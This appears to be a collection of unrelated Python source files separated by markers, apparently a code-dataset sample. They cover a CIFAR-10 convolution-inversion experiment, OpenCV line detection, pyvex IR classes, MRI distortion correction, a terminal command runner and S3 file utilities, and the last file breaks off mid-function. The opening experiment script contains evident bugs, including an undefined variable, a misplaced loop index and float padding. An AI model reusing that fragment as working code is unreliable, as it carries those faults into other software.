transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=DOWNLOAD, transform=transform_train)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=args.batch, shuffle=True, num_workers=2)
testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=DOWNLOAD, transform=transform_test)
testloader = torch.utils.data.DataLoader(testset, batch_size=args.batch, shuffle=False, num_workers=2)
device = 'cuda' if torch.cuda.is_available() else 'cpu'
kernel = args.kernel
padding = (kernel - 1) / 2 #ensure that input and output have the same dimensions
height = args.height
width = args.width
height_padding = height + padding * 2
width_padding = width + padding * 2
net = twoModule(args.kernel, args.channels)
net.to(device)
batch_idx = 0
for (inputs, targets) in tqdm(testloader):
batch_idx += 1
inputs, targets = inputs.to(device), targets.to(device)
outputs = net.forward(inputs)
W = weight(net.conv, net.bn)
B = bias(net.conv, net.bn)
A = torch.zeros(int(args.channels * height * width), int(args.channels * height_padding * width_padding))
if args.channels == 3:
w = W.clone().view(3, 3, kernel, kernel)
for i in range(3):
for j in range(height):
for k in range(width):
row_index = int(i * height * width + j * width + k)
for m in range(3):
for n in range(kernel):
for p in range(kernel):
A[row_index][int(k + n * width_padding + m * width_padding * height_padding + p)] = \
w[i][m][n][p]
elif args.channels == 1:
w = W.clone().view(kernel, -1)
for j in range(height):
for k in range(width):
row_index = int(j * width + k)
for n in range(kernel):
for p in range(kernel):
A[row_index][int(k + n * width_padding + p)] = w[n][p]
Padding = torch.zeros(int(args.channels * height_padding * width_padding), int(args.channels * height * width))
for m in range(args.channels):
for i in range(height):
for j in range(width):
Padding[int(m * width_padding * height_padding + p * width_padding + i * width_padding + padding + j)][
int(m * width * height + i * width + j)] = 1
AA = torch.mm(A, Padding)
b = outputs.clone().view(-1)
for i in range(args.channels):
for j in range(height):
for k in range(width):
b[i * height * width + j * width + k] -= B[i]
if args.batch != 1:
b = b.clone().view(args.batch, -1)
#Solve Ax=b to solve the implicit problem
#Prepare the preconditioner
max_tensor = torch.zeros(int(args.channels * height * width))
for k in range(int(args.channels * height * width)):
if abs(torch.max(AA[k]).item()) == 0:
max_tensor[k] = 0
else:
max_tensor[k] = 1.0 / abs(torch.max(AA[k]).item())
D = torch.diag(max_tensor)
# Apply the GMRES method
X = torch.zeros(int(args.batch * args.channels * height * width))
if args.batch != 1:
for i in range(args.batch):
z = gmres(AA.cpu().numpy(), b[i].cpu().numpy(), tol=1e-06, M=D.cpu().numpy())
for j in range(args.channels * height * width):
xx = torch.from_numpy(z[0])
X[i * args.channels * height * width + j] = xx[j]
else:
z = gmres(AA.cpu().numpy(), b.cpu().numpy(), tol=1e-06, M=D.cpu().numpy())
X = torch.from_numpy(z[0])
#calculate the numerical error
XX = X.clone().view(args.batch, args.channels, height, width)
Y = net(XX)
d = (outputs - Y).norm(1).item()
dd = (outputs - Y).norm(2).item()
ddd = abs(torch.max(outputs - Y).item())
s = (outputs - Y).norm(1).div(y.norm(1)).item()
ss = (outputs - Y).norm(2).div(y.norm(2)).item()
sss = abs(torch.max(outputs - Y).item()) / abs(torch.max(y).item())
print("error_1: %.8f, error_2: %.8f, error_3: %.8f, error_4: %.8f, error_5: %.8f, error_6: %.8f"
% (d, dd, ddd, s, ss, sss))
with open(os.path.join('WANTED_PATH' + str(args.num) + '.txt'), 'a') as f: #you need to modify the code here to get it running
f.write(str(d))
f.write(' ')
f.write(str(dd))
f.write(' ')
f.write(str(ddd))
f.write(' ')
f.write(str(s))
f.write(' ')
f.write(str(ss))
f.write(' ')
f.write(str(sss))
f.write('\n')
'''
|
python
|
import cv2
import numpy as np
from util import *
from copy import deepcopy
def get_horizontal_lines (img):
#=====[ Step 1: set parameters ]=====
num_peaks = 5
theta_buckets_horz = [-90, -89]
theta_resolution_horz = 0.0175 #raidans
rho_resolution_horz = 6
threshold_horz = 5
#=====[ Step 2: find lines in (rho, theta) ]=====
# [H, theta, rho] = hough (corners_img, 'Theta', theta_buckets_horz, 'RhoResolution', rho_resolution_horz);
# peaks = houghpeaks(H, num_peaks);
lines_rt = cv2.HoughLines (deepcopy(img), rho_resolution_horz, theta_resolution_horz, threshold_horz)[0]
print lines_rt
#####[ DEBUG: draw lines in (rho, theta) ]#####
img = draw_lines_rho_theta (img , lines_rt)
cv2.imshow ('HORIZONTAL LINES', img)
key = 0
while key != 27:
key = cv2.waitKey (30)
#=====[ Step 3: convert peaks to rho, theta ]=====
# theta_rad = fromDegrees ('radians', theta);
# rhos = rho(peaks(:, 1));
# thetas = theta_rad(peaks(:, 2));
# lines = [rhos; thetas];
#=====[ Step 4: figure out which lines they are ]=====
# indexed_lines = horizontal_ransac (lines);
#####[ DEBUG: show lines ]#####
# draw_lines (corners_img, indexed_lines(1:2, :));
def get_vertical_lines (img):
pass
if __name__ == "__main__":
corners_img_name = './IPC/corners.png';
corners_img = cv2.cvtColor(cv2.imread (corners_img_name), cv2.COLOR_BGR2GRAY);
#=====[ Step 2: get horizontal/vertical lines, along with indices up to a shift ]=====
horizontal_lines = get_horizontal_lines (corners_img);
# vertical_lines = get_vertical_lines (corners_img);
|
python
|
from . import VEXObject
class IRStmt(VEXObject):
"""
IR statements in VEX represents operations with side-effects.
"""
__slots__ = ['arch', 'tag']
def __init__(self, c_stmt, irsb):
VEXObject.__init__(self)
self.arch = irsb.arch
# self.c_stmt = c_stmt
self.tag = ints_to_enums[c_stmt.tag]
def pp(self):
print self.__str__()
@property
def expressions(self):
expressions = []
for k in self.__slots__:
v = getattr(self, k)
if isinstance(v, IRExpr):
expressions.append(v)
expressions.extend(v.child_expressions)
return expressions
@property
def constants(self):
return sum((e.constants for e in self.expressions), [])
@staticmethod
def _translate(c_stmt, irsb):
if c_stmt[0] == ffi.NULL:
return None
tag = c_stmt.tag
try:
stmt_class = _tag_to_class[tag]
except KeyError:
raise PyVEXError('Unknown/unsupported IRStmtTag %s\n' % ints_to_enums[tag])
return stmt_class(c_stmt, irsb)
class NoOp(IRStmt):
"""
A no-operation statement. It is usually the result of an IR optimization.
"""
def __init__(self, c_stmt, irsb): # pylint:disable=unused-argument
IRStmt.__init__(self, c_stmt, irsb)
def __str__(self):
return "IR-NoOp"
class IMark(IRStmt):
"""
An instruction mark. It marks the start of the statements that represent a single machine instruction (the end of
those statements is marked by the next IMark or the end of the IRSB). Contains the address and length of the
instruction.
"""
__slots__ = ['addr', 'len', 'delta']
def __init__(self, c_stmt, irsb):
IRStmt.__init__(self, c_stmt, irsb)
self.addr = c_stmt.Ist.IMark.addr
self.len = c_stmt.Ist.IMark.len
self.delta = c_stmt.Ist.IMark.delta
def __str__(self):
return "------ IMark(0x%x, %d, %d) ------" % (self.addr, self.len, self.delta)
class AbiHint(IRStmt):
"""
An ABI hint, provides specific information about this platform's ABI.
"""
__slots__ = ['base', 'len', 'nia']
def __init__(self, c_stmt, irsb):
IRStmt.__init__(self, c_stmt, irsb)
self.base = IRExpr._translate(c_stmt.Ist.AbiHint.base, irsb)
self.len = c_stmt.Ist.AbiHint.len
self.nia = IRExpr._translate(c_stmt.Ist.AbiHint.nia, irsb)
def __str__(self):
return "====== AbiHint(0x%s, %d, %s) ======" % (self.base, self.len, self.nia)
class Put(IRStmt):
"""
Write to a guest register, at a fixed offset in the guest state.
"""
__slots__ = ['data', 'offset']
def __init__(self, c_stmt, irsb):
IRStmt.__init__(self, c_stmt, irsb)
self.data = IRExpr._translate(c_stmt.Ist.Put.data, irsb)
self.offset = c_stmt.Ist.Put.offset
self.tmp = c_stmt.Ist.Put.tmp
def __str__(self):
return "PUT(%s) = %s" % (self.arch.translate_register_name(self.offset, self.data.result_size/8), self.data)
class PutI(IRStmt):
"""
Write to a guest register, at a non-fixed offset in the guest state.
"""
__slots__ = ['descr', 'ix', 'data', 'bias']
def __init__(self, c_stmt, irsb):
IRStmt.__init__(self, c_stmt, irsb)
self.descr = IRRegArray(c_stmt.Ist.PutI.details.descr)
self.ix = IRExpr._translate(c_stmt.Ist.PutI.details.ix, irsb)
self.data = IRExpr._translate(c_stmt.Ist.PutI.details.data, irsb)
self.bias = c_stmt.Ist.PutI.details.bias
def __str__(self):
return "PutI(%s)[%s,%d] = %s" % (self.descr, self.ix, self.bias, self.data)
class WrTmp(IRStmt):
"""
Assign a value to a temporary. Note that SSA rules require each tmp is only assigned to once. IR sanity checking
will reject any block containing a temporary which is not assigned to exactly once.
"""
__slots__ = ['data', 'tmp']
def __init__(self, c_stmt, irsb):
IRStmt.__init__(self, c_stmt, irsb)
self.data = IRExpr._translate(c_stmt.Ist.WrTmp.data, irsb)
self.tmp = c_stmt.Ist.WrTmp.tmp
def __str__(self):
return "t%d = %s" % (self.tmp, self.data)
class Store(IRStmt):
"""
Write a value to memory..
"""
__slots__ = ['addr', 'data', 'end']
def __init__(self, c_stmt, irsb):
IRStmt.__init__(self, c_stmt, irsb)
self.addr = IRExpr._translate(c_stmt.Ist.Store.addr, irsb)
self.data = IRExpr._translate(c_stmt.Ist.Store.data, irsb)
self.end = ints_to_enums[c_stmt.Ist.Store.end]
@property
def endness(self):
return self.end
def __str__(self):
return "ST%s(%s) = %s" % (self.endness[-2:].lower(), self.addr, self.data)
class CAS(IRStmt):
"""
an atomic compare-and-swap operation.
"""
__slots__ = ['addr', 'dataLo', 'dataHi', 'expdLo', 'expdHi', 'oldLo', 'oldHi', 'end']
def __init__(self, c_stmt, irsb):
IRStmt.__init__(self, c_stmt, irsb)
self.addr = IRExpr._translate(c_stmt.Ist.CAS.details.addr, irsb)
self.dataLo = IRExpr._translate(c_stmt.Ist.CAS.details.dataLo, irsb)
self.dataHi = IRExpr._translate(c_stmt.Ist.CAS.details.dataHi, irsb)
self.expdLo = IRExpr._translate(c_stmt.Ist.CAS.details.expdLo, irsb)
self.expdHi = IRExpr._translate(c_stmt.Ist.CAS.details.expdHi, irsb)
self.oldLo = c_stmt.Ist.CAS.details.oldLo
self.oldHi = c_stmt.Ist.CAS.details.oldHi
self.end = ints_to_enums[c_stmt.Ist.CAS.details.end]
@property
def endness(self):
return self.end
def __str__(self):
return "t(%s,%s) = CAS%s(%s :: (%s,%s)->(%s,%s))" % (
self.oldLo, self.oldHi, self.end[-2:].lower(), self.addr, self.expdLo, self.expdHi, self.dataLo, self.dataHi)
class LLSC(IRStmt):
"""
Either Load-Linked or Store-Conditional, depending on STOREDATA. If STOREDATA is NULL then this is a Load-Linked,
else it is a Store-Conditional.
"""
__slots__ = ['addr', 'storedata', 'result', 'result_size', 'end']
def __init__(self, c_stmt, irsb):
IRStmt.__init__(self, c_stmt, irsb)
self.addr = IRExpr._translate(c_stmt.Ist.LLSC.addr, irsb)
self.storedata = IRExpr._translate(c_stmt.Ist.LLSC.storedata, irsb)
self.result = c_stmt.Ist.LLSC.result
self.end = ints_to_enums[c_stmt.Ist.LLSC.end]
try:
self.result_size = type_sizes[irsb.tyenv.types[self.result]]
except IndexError:
self.result_size = None
@property
def endness(self):
return self.end
def __str__(self):
if self.storedata is None:
return "t%d = LD%s-Linked(%s)" % (self.result, self.end[-2:].lower(), self.addr)
else:
return "t%d = ( ST%s-Cond(%s) = %s )" % (self.result, self.end[-2:].lower(), self.addr, self.storedata)
class MBE(IRStmt):
__slots__ = ['event']
def __init__(self, c_stmt, irsb):
IRStmt.__init__(self, c_stmt, irsb)
self.event = ints_to_enums[c_stmt.Ist.MBE.event]
def __str__(self):
return "MBusEvent-" + self.event
class Dirty(IRStmt):
__slots__ = ['cee', 'guard', 'tmp', 'mFx', 'mAddr', 'mSize', 'nFxState', 'args', 'result_size']
def __init__(self, c_stmt, irsb):
IRStmt.__init__(self, c_stmt, irsb)
self.cee = IRCallee(c_stmt.Ist.Dirty.details.cee)
self.guard = IRExpr._translate(c_stmt.Ist.Dirty.details.guard, irsb)
self.tmp = c_stmt.Ist.Dirty.details.tmp
self.mFx = ints_to_enums[c_stmt.Ist.Dirty.details.mFx]
self.mAddr = IRExpr._translate(c_stmt.Ist.Dirty.details.mAddr, irsb)
self.mSize = c_stmt.Ist.Dirty.details.mSize
self.nFxState = c_stmt.Ist.Dirty.details.nFxState
args = []
for i in range(20):
a = c_stmt.Ist.Dirty.details.args[i]
if a == ffi.NULL:
break
args.append(IRExpr._translate(a, irsb))
self.args = tuple(args)
try:
self.result_size = type_sizes[irsb.tyenv.types[self.tmp]]
except IndexError:
self.result_size = None
def __str__(self):
return "t%s = DIRTY %s %s ::: %s(%s)" % (
self.tmp, self.guard, "TODO(effects)", self.cee, ','.join(str(a) for a in self.args))
@property
def child_expressions(self):
expressions = sum((a.child_expressions for a in self.args), [])
expressions.extend(self.args)
expressions.append(self.guard)
expressions.extend(self.guard.child_expressions)
return expressions
class Exit(IRStmt):
"""
A conditional exit from the middle of an IRSB.
"""
__slots__ = ['guard', 'dst', 'offsIP', 'jk']
def __init__(self, c_stmt, irsb):
IRStmt.__init__(self, c_stmt, irsb)
self.guard = IRExpr._translate(c_stmt.Ist.Exit.guard, irsb)
self.dst = IRConst._translate(c_stmt.Ist.Exit.dst)
self.offsIP = c_stmt.Ist.Exit.offsIP
self.jk = ints_to_enums[c_stmt.Ist.Exit.jk]
@property
def jumpkind(self):
return self.jk
def __str__(self):
return "if (%s) { PUT(%s) = %s; %s }" % (
self.guard, self.arch.translate_register_name(self.offsIP), hex(self.dst.value), self.jumpkind)
@property
def child_expressions(self):
return [self.guard, self.dst] + self.guard.child_expressions
class LoadG(IRStmt):
"""
A guarded load.
"""
__slots__ = ['addr', 'alt', 'guard', 'dst', 'cvt', 'end', 'cvt_types']
def __init__(self, c_stmt, irsb):
IRStmt.__init__(self, c_stmt, irsb)
self.addr = IRExpr._translate(c_stmt.Ist.LoadG.details.addr, irsb)
self.alt = IRExpr._translate(c_stmt.Ist.LoadG.details.alt, irsb)
self.guard = IRExpr._translate(c_stmt.Ist.LoadG.details.guard, irsb)
self.dst = c_stmt.Ist.LoadG.details.dst
self.cvt = ints_to_enums[c_stmt.Ist.LoadG.details.cvt]
self.end = ints_to_enums[c_stmt.Ist.LoadG.details.end]
type_in = ffi.new('IRType *')
type_out = ffi.new('IRType *')
pvc.typeOfIRLoadGOp(c_stmt.Ist.LoadG.details.cvt, type_out, type_in)
type_in = ffi.cast('int *', type_in)[0]
type_out = ffi.cast('int *', type_out)[0]
self.cvt_types = (ints_to_enums[type_in], ints_to_enums[type_out])
@property
def endness(self):
return self.end
def __str__(self):
return "t%d = if (%s) %s(LD%s(%s)) else %s" % (
self.dst, self.guard, self.cvt, self.end[-2:].lower(), self.addr, self.alt)
class StoreG(IRStmt):
"""
A guarded store.
"""
__slots__ = ['addr', 'data', 'guard', 'end']
def __init__(self, c_stmt, irsb):
IRStmt.__init__(self, c_stmt, irsb)
self.addr = IRExpr._translate(c_stmt.Ist.StoreG.details.addr, irsb)
self.data = IRExpr._translate(c_stmt.Ist.StoreG.details.data, irsb)
self.guard = IRExpr._translate(c_stmt.Ist.StoreG.details.guard, irsb)
self.end = ints_to_enums[c_stmt.Ist.StoreG.details.end]
@property
def endness(self):
return self.end
def __str__(self):
return "if (%s) ST%s(%s) = %s" % (self.guard, self.end[-2:].lower(), self.addr, self.data)
from .expr import IRExpr
from .const import IRConst
from .enums import IRRegArray, ints_to_enums, enums_to_ints, IRCallee, type_sizes
from .errors import PyVEXError
from . import ffi, pvc
_tag_to_class = {
enums_to_ints['Ist_NoOp']: NoOp,
enums_to_ints['Ist_IMark']: IMark,
enums_to_ints['Ist_AbiHint']: AbiHint,
enums_to_ints['Ist_Put']: Put,
enums_to_ints['Ist_PutI']: PutI,
enums_to_ints['Ist_WrTmp']: WrTmp,
enums_to_ints['Ist_Store']: Store,
enums_to_ints['Ist_LoadG']: LoadG,
enums_to_ints['Ist_StoreG']: StoreG,
enums_to_ints['Ist_CAS']: CAS,
enums_to_ints['Ist_LLSC']: LLSC,
enums_to_ints['Ist_Dirty']: Dirty,
enums_to_ints['Ist_MBE']: MBE,
enums_to_ints['Ist_Exit']: Exit,
}
|
python
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
#
# Copyright 2021 The NiPreps Developers <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# We support and encourage derived works from this project, please read
# about our expectations at
#
# https://www.nipreps.org/community/licensing/
#
"""The :math:`B_0` unwarping transform formalism."""
from pathlib import Path
import attr
import numpy as np
from scipy import ndimage as ndi
from scipy.sparse import vstack as sparse_vstack, csr_matrix, kron
import nibabel as nb
from bids.utils import listify
@attr.s(slots=True)
class B0FieldTransform:
"""Represents and applies the transform to correct for susceptibility distortions."""
coeffs = attr.ib(default=None)
shifts = attr.ib(default=None, init=False)
def fit(self, spatialimage):
r"""
Generate the interpolation matrix (and the VSM with it).
Implements Eq. :math:`\eqref{eq:1}`, interpolating :math:`f(\mathbf{s})`
for all voxels in the target-image's extent.
"""
# Calculate the physical coordinates of target grid
if isinstance(spatialimage, (str, bytes, Path)):
spatialimage = nb.load(spatialimage)
if self.shifts is not None:
newaff = spatialimage.affine
newshape = spatialimage.shape
if np.all(newshape == self.shifts.shape) and np.allclose(
newaff, self.shifts.affine
):
return
weights = []
coeffs = []
# Generate tensor-product B-Spline weights
for level in listify(self.coeffs):
wmat = grid_bspline_weights(spatialimage, level)
weights.append(wmat)
coeffs.append(level.get_fdata(dtype="float32").reshape(-1))
# Interpolate the VSM (voxel-shift map)
vsm = np.zeros(spatialimage.shape[:3], dtype="float32")
vsm = (np.squeeze(np.vstack(coeffs).T) @ sparse_vstack(weights)).reshape(
vsm.shape
)
# Cache
self.shifts = nb.Nifti1Image(vsm, spatialimage.affine, None)
def apply(
self,
spatialimage,
pe_dir,
ro_time,
order=3,
mode="constant",
cval=0.0,
prefilter=True,
output_dtype=None,
):
"""
Apply a transformation to an image, resampling on the reference spatial object.
Parameters
----------
spatialimage : `spatialimage`
The image object containing the data to be resampled in reference
space
reference : spatial object, optional
The image, surface, or combination thereof containing the coordinates
of samples that will be sampled.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : {'constant', 'reflect', 'nearest', 'mirror', 'wrap'}, optional
Determines how the input image is extended when the resamplings overflows
a border. Default is 'constant'.
cval : float, optional
Constant value for ``mode='constant'``. Default is 0.0.
prefilter: bool, optional
Determines if the image's data array is prefiltered with
a spline filter before interpolation. The default is ``True``,
which will create a temporary *float64* array of filtered values
if *order > 1*. If setting this to ``False``, the output will be
slightly blurred if *order > 1*, unless the input is prefiltered,
i.e. it is the result of calling the spline filter on the original
input.
Returns
-------
resampled : `spatialimage` or ndarray
The data imaged after resampling to reference space.
"""
# Ensure the vsm has been computed
self.fit(spatialimage)
vsm = self.shifts.get_fdata().copy()
# Reverse shifts if reversed blips
if pe_dir.endswith("-"):
vsm *= -1.0
# Generate warp field
pe_axis = "ijk".index(pe_dir[0])
# Map voxel coordinates applying the VSM
ijk_axis = tuple([np.arange(s) for s in vsm.shape])
voxcoords = np.array(np.meshgrid(*ijk_axis, indexing="ij"), dtype="float32")
voxcoords[pe_axis, ...] += vsm * ro_time
# Prepare data
data = np.squeeze(np.asanyarray(spatialimage.dataobj))
output_dtype = output_dtype or data.dtype
# Resample
resampled = ndi.map_coordinates(
data,
voxcoords.reshape(3, -1),
output=output_dtype,
order=order,
mode=mode,
cval=cval,
prefilter=prefilter,
).reshape(spatialimage.shape)
moved = spatialimage.__class__(
resampled, spatialimage.affine, spatialimage.header
)
moved.header.set_data_dtype(output_dtype)
return moved
def to_displacements(self, ro_time, pe_dir):
"""
Generate a NIfTI file containing a displacements field transform compatible with ITK/ANTs.
The displacements field can be calculated following
`Eq. (2) in the fieldmap fitting section
<sdcflows.workflows.fit.fieldmap.html#mjx-eqn-eq%3Afieldmap-2>`__.
Parameters
----------
ro_time : :obj:`float`
The total readout time in seconds (only if ``vsm=False``).
pe_dir : :obj:`str`
The ``PhaseEncodingDirection`` metadata value (only if ``vsm=False``).
Returns
-------
spatialimage : :obj:`nibabel.nifti.Nifti1Image`
A NIfTI 1.0 object containing the distortion.
"""
from math import pi
from nibabel.affines import voxel_sizes, obliquity
from nibabel.orientations import io_orientation
# Generate warp field
data = self.shifts.get_fdata(dtype="float32").copy()
pe_axis = "ijk".index(pe_dir[0])
pe_sign = -1.0 if pe_dir.endswith("-") else 1.0
pe_size = self.shifts.header.get_zooms()[pe_axis]
data *= pe_sign * ro_time * pe_size
fieldshape = tuple(list(data.shape[:3]) + [3])
# Compose a vector field
field = np.zeros((data.size, 3), dtype="float32")
field[..., pe_axis] = data.reshape(-1)
# If coordinate system is oblique, project displacements through directions matrix
aff = self.shifts.affine
if obliquity(aff).max() * 180 / pi > 0.01:
dirmat = np.eye(4)
dirmat[:3, :3] = aff[:3, :3] / (
voxel_sizes(aff) * io_orientation(aff)[:, 1]
)
field = nb.affines.apply_affine(dirmat, field)
warpnii = nb.Nifti1Image(
field.reshape(fieldshape)[:, :, :, np.newaxis, :], aff, None
)
warpnii.header.set_intent("vector", (), "")
warpnii.header.set_xyzt_units("mm")
return warpnii
def _cubic_bspline(d):
"""Evaluate the cubic bspline at distance d from the center."""
return np.piecewise(
d,
[d < 1.0, d >= 1.0],
[
lambda d: (4.0 - 6.0 * d ** 2 + 3.0 * d ** 3) / 6.0,
lambda d: (2.0 - d) ** 3 / 6.0,
],
)
def grid_bspline_weights(target_nii, ctrl_nii):
r"""
Evaluate tensor-product B-Spline weights on a grid.
For each of the *N* input samples :math:`(s_1, s_2, s_3)` and *K* control
points or *knots* :math:`\mathbf{k} =(k_1, k_2, k_3)`, the tensor-product
cubic B-Spline kernel weights are calculated:
.. math::
\Psi^3(\mathbf{k}, \mathbf{s}) =
\beta^3(s_1 - k_1) \cdot \beta^3(s_2 - k_2) \cdot \beta^3(s_3 - k_3),
\label{eq:2}\tag{2}
where each :math:`\beta^3` represents the cubic B-Spline for one dimension.
The 1D B-Spline kernel implementation uses :obj:`numpy.piecewise`, and is based on the
closed-form given by Eq. (6) of [Unser1999]_.
By iterating over dimensions, the data samples that fall outside of the compact
support of the tensor-product kernel associated to each control point can be filtered
out and dismissed to lighten computation.
Finally, the resulting weights matrix :math:`\Psi^3(\mathbf{k}, \mathbf{s})`
can be easily identified in Eq. :math:`\eqref{eq:1}` and used as the design matrix
for approximation of data.
Parameters
----------
target_nii : :obj:`nibabel.spatialimages`
An spatial image object (typically, a :obj:`~nibabel.nifti1.Nifti1Image`)
embedding the target EPI image to be corrected.
Provides the location of the *N* samples (total number of voxels) in the space.
ctrl_nii : :obj:`nibabel.spatialimages`
An spatial image object (typically, a :obj:`~nibabel.nifti1.Nifti1Image`)
embedding the location of the control points of the B-Spline grid.
The data array should contain a total of :math:`K` knots (control points).
Returns
-------
weights : :obj:`numpy.ndarray` (:math:`K \times N`)
A sparse matrix of interpolating weights :math:`\Psi^3(\mathbf{k}, \mathbf{s})`
for the *N* voxels of the target EPI, for each of the total *K* knots.
This sparse matrix can be directly used as design matrix for the fitting
step of approximation/extrapolation.
"""
shape = target_nii.shape[:3]
ctrl_sp = ctrl_nii.header.get_zooms()[:3]
ras2ijk = np.linalg.inv(ctrl_nii.affine)
origin = nb.affines.apply_affine(ras2ijk, [tuple(target_nii.affine[:3, 3])])[0]
wd = []
for i, (o, n, sp) in enumerate(
zip(origin, shape, target_nii.header.get_zooms()[:3])
):
locations = np.arange(0, n, dtype="float16") * sp / ctrl_sp[i] + o
knots = np.arange(0, ctrl_nii.shape[i], dtype="float16")
distance = np.abs(locations[np.newaxis, ...] - knots[..., np.newaxis])
within_support = distance < 2.0
d_vals, d_idxs = np.unique(distance[within_support], return_inverse=True)
bs_w = _cubic_bspline(d_vals)
weights = np.zeros_like(distance, dtype="float32")
weights[within_support] = bs_w[d_idxs]
wd.append(csr_matrix(weights))
return kron(kron(wd[0], wd[1]), wd[2])
|
python
|
# this is a python script because handling Ctrl+C interrupts in batch
# scripts seems to be impossible
#
# This should always run in the same python that Porcupine uses.
from __future__ import annotations
import subprocess
import sys
import colorama
colorama.init()
prog, directory, command = sys.argv
print(colorama.Fore.BLUE + command + colorama.Fore.RESET)
try:
returncode: int | None = subprocess.call(command, cwd=directory, shell=True)
except KeyboardInterrupt:
# the subprocess should have already printed any traceback or
# whatever it might want to print
# TODO: try to catch the return code in this case as well?
returncode = None
print()
print("-----------------------------")
if returncode == 0:
print("The program completed successfully.")
elif returncode is None:
print("The program was interrupted.")
else:
print(f"The program failed with status {returncode}.")
print("Press Enter to close this window...")
input()
|
python
|
import io
import os
import urllib
import boto3
import botocore
import shutil
import subprocess
import tempfile
from google.protobuf import json_format
from pathlib import Path
from threading import Timer
from urllib.parse import urlparse
class NotReadableError(Exception):
pass
class NotWritableError(Exception):
pass
class ProtobufParseException(Exception):
pass
def make_dir(path, check_empty=False, force_empty=False, use_dirname=False):
"""Make a directory.
Args:
path: path to directory
check_empty: if True, check that directory is empty
force_empty: if True, delete files if necessary to make directory
empty
use_dirname: if path is a file, use the the parent directory as path
Raises:
ValueError if check_empty is True and directory is not empty
"""
directory = path
if use_dirname:
directory = os.path.dirname(path)
if force_empty and os.path.isdir(directory):
shutil.rmtree(directory)
os.makedirs(directory, exist_ok=True)
is_empty = len(os.listdir(directory)) == 0
if check_empty and not is_empty:
raise ValueError(
'{} needs to be an empty directory!'.format(directory))
def get_local_path(uri, download_dir):
"""Convert a URI into a corresponding local path.
If a uri is local, return it. If it's remote, we generate a path for it
within download_dir. For an S3 path of form s3://<bucket>/<key>, the path
is <download_dir>/s3/<bucket>/<key>.
Args:
uri: (string) URI of file
download_dir: (string) path to directory
Returns:
(string) a local path
"""
if uri is None:
return None
parsed_uri = urlparse(uri)
if parsed_uri.scheme == '':
path = uri
elif parsed_uri.scheme == 's3':
path = os.path.join(download_dir, 's3', parsed_uri.netloc,
parsed_uri.path[1:])
elif parsed_uri.scheme in ['http', 'https']:
path = os.path.join(download_dir, 'http', parsed_uri.netloc,
parsed_uri.path[1:])
return path
def sync_dir(src_dir_uri, dest_dir_uri, delete=False):
"""Synchronize a local and remote directory.
Transfers files from source to destination directories so that the
destination has all the source files. If delete is True, also delete
files in the destination to match those in the source directory.
Args:
src_dir_uri: (string) URI of source directory
dest_dir_uri: (string) URI of destination directory
delete: (bool)
"""
command = ['aws', 's3', 'sync', src_dir_uri, dest_dir_uri]
if delete:
command.append('--delete')
subprocess.run(command)
def start_sync(src_dir_uri, dest_dir_uri, sync_interval=600):
"""Start syncing a directory on a schedule.
Calls sync_dir on a schedule.
Args:
src_dir_uri: (string) URI of source directory
dest_dir_uri: (string) URI of destination directory
sync_interval: (int) period in seconds for syncing
"""
def _sync_dir(delete=True):
sync_dir(src_dir_uri, dest_dir_uri, delete=delete)
thread = Timer(sync_interval, _sync_dir)
thread.daemon = True
thread.start()
if urlparse(dest_dir_uri).scheme == 's3':
# On first sync, we don't want to delete files on S3 to match
# the contents of output_dir since there's nothing there yet.
_sync_dir(delete=False)
def download_if_needed(uri, download_dir):
"""Download a file into a directory if it's remote.
If uri is local, there is no need to download the file.
Args:
uri: (string) URI of file
download_dir: (string) local directory to download file into
Returns:
(string) path to local file
Raises:
NotReadableError if URI cannot be read from
"""
if uri is None:
return None
path = get_local_path(uri, download_dir)
make_dir(path, use_dirname=True)
parsed_uri = urlparse(uri)
if parsed_uri.scheme == 's3':
try:
print('Downloading {} to {}'.format(uri, path))
s3 = boto3.client('s3')
s3.download_file(parsed_uri.netloc, parsed_uri.path[1:], path)
except botocore.exceptions.ClientError:
raise NotReadableError('Could not read {}'.format(uri))
elif parsed_uri.scheme in ['http', 'https']:
with urllib.request.urlopen(uri) as response:
with open(path, 'wb') as out_file:
try:
shutil.copyfileobj(response, out_file)
except Exception:
raise NotReadableError('Could not read {}'.format(uri))
else:
not_found = not os.path.isfile(path)
if not_found:
raise NotReadableError('Could not read {}'.format(uri))
return path
def upload_if_needed(src_path, dst_uri):
"""Upload a file if the destination is remote.
If dst_uri is local, there is no need to upload.
Args:
src_path: (string) path to source file
dst_uri: (string) URI of destination for file
Raises:
NotWritableError if URI cannot be written to
"""
if dst_uri is None:
return
if not (os.path.isfile(src_path) or os.path.isdir(src_path)):
raise Exception('{} does not exist.'.format(src_path))
parsed_uri = urlparse(dst_uri)
if parsed_uri.scheme == 's3':
# Strip the leading slash off of the path since S3 does not expect it.
print('Uploading {} to {}'.format(src_path, dst_uri))
if os.path.isfile(src_path):
try:
s3 = boto3.client('s3')
s3.upload_file(src_path, parsed_uri.netloc,
parsed_uri.path[1:])
except Exception:
raise NotWritableError('Could not write {}'.format(dst_uri))
else:
sync_dir(src_path, dst_uri, delete=True)
def file_to_str(file_uri):
"""Download contents of text file into a string.
Args:
file_uri: (string) URI of file
Returns:
(string) with contents of text file
Raises:
NotReadableError if URI cannot be read from
"""
parsed_uri = urlparse(file_uri)
if parsed_uri.scheme == 's3':
with io.BytesIO() as file_buffer:
try:
s3 = boto3.client('s3')
s3.download_fileobj(parsed_uri.netloc, parsed_uri.path[1:],
file_buffer)
return file_buffer.getvalue().decode('utf-8')
except botocore.exceptions.ClientError:
raise NotReadableError('Could not read {}'.format(file_uri))
else:
if not os.path.isfile(file_uri):
raise NotReadableError('Could not read {}'.format(file_uri))
with open(file_uri, 'r') as file_buffer:
return file_buffer.read()
def str_to_file(content_str, file_uri):
